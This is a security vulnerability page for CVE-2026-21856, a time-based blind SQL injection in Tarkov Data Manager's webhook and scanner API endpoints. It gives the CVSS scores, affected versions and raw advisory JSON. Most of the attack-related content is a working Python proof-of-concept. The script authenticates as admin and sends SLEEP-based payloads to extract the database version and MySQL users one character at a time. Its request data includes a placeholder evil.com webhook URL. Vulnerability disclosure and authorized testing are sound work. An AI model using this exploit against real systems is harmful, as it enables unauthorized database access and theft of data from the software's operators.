Security Vulnerability Report
中文
CVE-2026-21856 CVSS 7.2 HIGH

CVE-2026-21856

Published: 2026-01-07 19:15:58
Last Modified: 2026-02-03 16:19:37
Source: [email protected]

Description

The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8, a time based blind SQL injection vulnerability in the webhook edit and scanner api endpoints that allow an authenticated attacker to execute arbitrary SQL queries against the MySQL database. Commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 contains a patch.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:* - VULNERABLE
Tarkov Data Manager < commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2026-21856 Time-Based Blind SQL Injection PoC # Target: Tarkov Data Manager webhook edit / scanner API endpoints TARGET_URL = "http://target-server/api/webhook/edit" # Replace with actual target URL session = requests.Session() # Authenticate with high-privilege account session.post("http://target-server/api/auth/login", json={ "username": "admin", "password": "password" }) def time_based_blind_sqli(payload): """Execute time-based blind SQL injection""" headers = { "Content-Type": "application/json", "X-Auth-Token": session.cookies.get("session_token") } data = { "webhook_id": "1", "name": payload, "url": "http://evil.com/webhook" } start_time = time.time() response = session.post(TARGET_URL, json=data, headers=headers, timeout=30) elapsed = time.time() - start_time return elapsed > 10 # True if SLEEP(10) was executed # Example: Test if database version contains 'MariaDB' def extract_db_version(): """Extract database version using blind SQL injection""" charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-" result = "" for pos in range(1, 50): for char in charset: payload = f"test' AND IF(SUBSTRING(@@version,{pos},1)='{char}',SLEEP(5),0)-- -" if time_based_blind_sqli(payload): result += char print(f"[*] Extracted: {result}") break if len(result) == pos - 1: break return result # Example: Extract database users def extract_db_users(): """Extract MySQL users from database""" charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._" result = "" for pos in range(1, 100): for char in charset: payload = f"test' AND IF(SUBSTRING(user(),{pos},1)='{char}',SLEEP(5),0)-- -" if time_based_blind_sqli(payload): result += char print(f"[*] User: {result}") break return result if __name__ == "__main__": print("CVE-2026-21856 Blind SQL Injection Test") # Test basic injection test_payload = "test' AND SLEEP(5)-- -" if time_based_blind_sqli(test_payload): print("[!] Vulnerability confirmed - Time delay detected") else: print("[-] No vulnerability detected or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21856", "sourceIdentifier": "[email protected]", "published": "2026-01-07T19:15:58.147", "lastModified": "2026-02-03T16:19:36.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8, a time based blind SQL injection vulnerability in the webhook edit and scanner api endpoints that allow an authenticated attacker to execute arbitrary SQL queries against the MySQL database. Commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 contains a patch."}, {"lang": "es", "value": "El Tarkov Data Manager es una herramienta para gestionar los datos de ítems de Tarkov. Antes del commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8, existía una vulnerabilidad de inyección SQL ciega basada en tiempo en los endpoints de la API de edición de webhook y escáner que permitía a un atacante autenticado ejecutar consultas SQL arbitrarias contra la base de datos MySQL. El commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-01-02", "matchCriteriaId": "3B0D9912-7D05-4040-9D9D-FC07BBF07FFC"}]}]}], "references": [{"url": "https://github.com/the-hideout/tarkov-data-manager/commit/9bdb3a75a98a7047b6d70144eb1da1655d6992a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-4gcx-ghwc-rc78", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.